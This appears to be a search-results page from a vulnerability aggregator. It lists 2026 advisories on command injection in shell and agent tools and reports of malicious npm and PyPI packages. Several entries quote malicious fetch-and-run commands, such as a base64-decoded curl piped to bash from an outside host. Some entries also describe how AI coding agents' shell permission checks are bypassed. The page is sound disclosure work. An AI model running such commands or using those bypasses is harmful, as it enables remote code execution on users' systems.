Lucene search
K

2657 matches found

attackerkb
attackerkb
added 2026/05/26 4:45 p.m.10 views

CVE-2026-9565

A vulnerability was determined in haojing8312 WorkClaw up to 0.6.4. This affects the function isdangerous of the file apps/runtime/src-tauri/src/agent/tools/bash.rs of the component Blacklist Handler. Executing a manipulation can lead to os command injection. The attack can be executed remotely...

6.5CVSS5.5AI score0.0105EPSS
Exploits0References5Affected Software1
cve
cve
added 2026/05/26 4:45 p.m.16 views

CVE-2026-9565

A CVE entry for haojing8312 WorkClaw ≤ 0.6.4 describes a vulnerability in the Blacklist Handler, specifically the is_dangerous function in apps/runtime/src-tauri/src/agent/tools/bash.rs. The underlying issue enables os command injection via manipulation, with remote execution possible. Public dis...

6.5CVSS6.3AI score0.0105EPSS
Exploits0References5
attackerkb
attackerkb
added 2026/05/26 3:49 p.m.8 views

CVE-2026-44723

Vowpal Wabbit is a machine learning system. The workflow .github/workflows/pythonchecks.yml embeds $ github.event.pullrequest.title directly inside double-quoted bash strings in four separate steps across four jobs, each passing it as a CLI argument to the Python test script...

5CVSS6.1AI score0.00469EPSS
Exploits1References3
euvd
euvd
added 2026/05/26 3:49 p.m.16 views

EUVD-2026-31902

Vowpal Wabbit is a machine learning system. The workflow .github/workflows/pythonchecks.yml embeds $ github.event.pullrequest.title directly inside double-quoted bash strings in four separate steps across four jobs, each passing it as a CLI argument to the Python test script...

5CVSS6.1AI score0.00469EPSS
Exploits1References2
ossf
ossf
added 2026/05/26 10:43 a.m.14 views

Malicious code in m-at-star-tools (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...

6.2AI score
Exploits0References2
cnnvd
cnnvd
added 2026/05/26 12:0 a.m.14 views

vowpal_wabbit 安全漏洞

vowpalwabbit is an open-source fast online machine learning system developed by Vowpal Wabbit. There is a security vulnerability in vowpalwabbit, which stems from directly embedding PR titles into bash strings within the workflow. This could lead to arbitrary command execution...

9.9CVSS5.9AI score0.00469EPSS
Exploits1References3
ptsecurity
ptsecurity
added 2026/05/26 12:0 a.m.12 views

PT-2026-43328

A vulnerability was determined in haojing8312 WorkClaw up to 0.6.4. This affects the function is dangerous of the file apps/runtime/src-tauri/src/agent/tools/bash.rs of the component Blacklist Handler. Executing a manipulation can lead to os command injection. The attack can be executed remotely...

6.5CVSS6.3AI score0.0105EPSS
Exploits0References6
ossf
ossf
added 2026/05/21 1:49 p.m.11 views

Malicious code in @lokuma/cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586 The update subcommand of this CLI executes curl -fsSL | bash where the URL is...

6AI score
Exploits0References1
ossf
ossf
added 2026/05/20 9:43 a.m.12 views

Malicious code in gm-kilo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b4a35ea8669a2b02f60117ecc483176741399084b0fbebf11900d0a89505d9fb package.json declares an install lifecycle script that runs bin/gm-kilo.js install. At install time, the script executes bun x gm-plugkit@latest spoo...

6.2AI score
Exploits0References1
osv
osv
added 2026/05/20 9:43 a.m.13 views

MAL-2026-4574 Malicious code in gm-kilo (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b4a35ea8669a2b02f60117ecc483176741399084b0fbebf11900d0a89505d9fb package.json declares an install lifecycle script that runs bin/gm-kilo.js install. At install time, the script executes bun x gm-plugkit@latest spoo...

6.2AI score
Exploits0References1
ossf
ossf
added 2026/05/20 8:34 a.m.13 views

Malicious code in prjct-cli (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 72b60bff5e0e18ecdc993dc505651612acba538fd6c5e46c4ea69619c453f8f9 On npm install, scripts/postinstall.js invokes scripts/ensure-bun.sh, which runs curl -fsSL https://bun.sh/install | bash with no version pin and no...

6.3AI score
Exploits0References1
veracode
veracode
added 2026/05/16 5:30 a.m.10 views

Command Injection

uniget is vulnerable to Command Injection. The vulnerability is due to unsafe execution of the untrusted check field from metadata files through /bin/bash -c without proper validation or sanitization, which allows an attacker to execute arbitrary shell commands on the victim's system...

7.8CVSS6.2AI score0.00715EPSS
Exploits0References4Affected Software1
veracode
veracode
added 2026/05/16 5:18 a.m.14 views

Sandbox Bypass

OpenClaude is vulnerable to Improper Access Control. The vulnerability is due to a logic flaw in bashToolHasPermission within src/tools/BashTool/bashPermissions.ts, where the sandbox auto-allow path returns success before checkPathConstraints is evaluated, allowing attackers to use path traversal...

8.4CVSS5.8AI score0.00232EPSS
Exploits2References2Affected Software1
veracode
veracode
added 2026/05/16 5:16 a.m.12 views

Arbitrary Code Execution

GitHub Copilot CLI is vulnerable to Command Injection. The vulnerability is due to improper safety assessment of shell commands in the shell tool, where dangerous Bash parameter expansion patterns such as $var@P, $!var, $var:=value, and nested $cmd expressions are incorrectly classified as...

7.8CVSS6AI score0.00363EPSS
Exploits1References2Affected Software1
redhatcve
redhatcve
added 2026/05/16 1:56 a.m.16 views

CVE-2026-45369

python-utcp is the python implementation of UTCP. Prior to 1.1.3, the substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c Unix o...

8.3CVSS5.9AI score0.00272EPSS
Exploits0References1
vulnrichment
vulnrichment
added 2026/05/15 4:47 p.m.12 views

CVE-2026-45036 Tabby auto-confirms ZMODEM detection on terminal output, leading to shell command execution from displayed file content under fish, bash, and zsh

Tabby formerly Terminus is a highly configurable terminal emulator. Prior to 1.0.233, Tabby before 1.0.233 automatically confirms ZMODEM protocol detection on all terminal session output without user interaction, enabling shell command execution when a user displays attacker-controlled content. T...

7CVSS6.2AI score0.0013EPSS
Exploits0References1
cvelist
cvelist
added 2026/05/15 4:47 p.m.46 views

CVE-2026-45036 Tabby auto-confirms ZMODEM detection on terminal output, leading to shell command execution from displayed file content under fish, bash, and zsh

Tabby formerly Terminus is a highly configurable terminal emulator. Prior to 1.0.233, Tabby before 1.0.233 automatically confirms ZMODEM protocol detection on all terminal session output without user interaction, enabling shell command execution when a user displays attacker-controlled content. T...

7CVSS0.0013EPSS
Exploits0References1
nvd
nvd
added 2026/05/14 9:16 p.m.28 views

CVE-2026-45369

python-utcp is the python implementation of UTCP. Prior to 1.1.3, the substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c Unix o...

8.3CVSS0.00272EPSS
Exploits0References1
github
github
added 2026/05/14 8:56 p.m.14 views

utcp-cli Vulnerable to Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

Summary The substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c Unix or powershell.exe -Command Windows, allowing an attacker to...

8.3CVSS6AI score0.00272EPSS
Exploits0References3Affected Software1
vulnrichment
vulnrichment
added 2026/05/14 8:14 p.m.11 views

CVE-2026-45369 python-utcp: Command Injection via Unsanitized Argument Substitution in CLI Communication Protocol

python-utcp is the python implementation of UTCP. Prior to 1.1.3, the substituteutcpargs method in clicommunicationprotocol.py inserts user-controlled toolargs values directly into shell command strings without any sanitization or escaping. These commands are then executed via /bin/bash -c Unix o...

8.3CVSS5.9AI score0.00272EPSS
Exploits0References1
Rows per page
Query Builder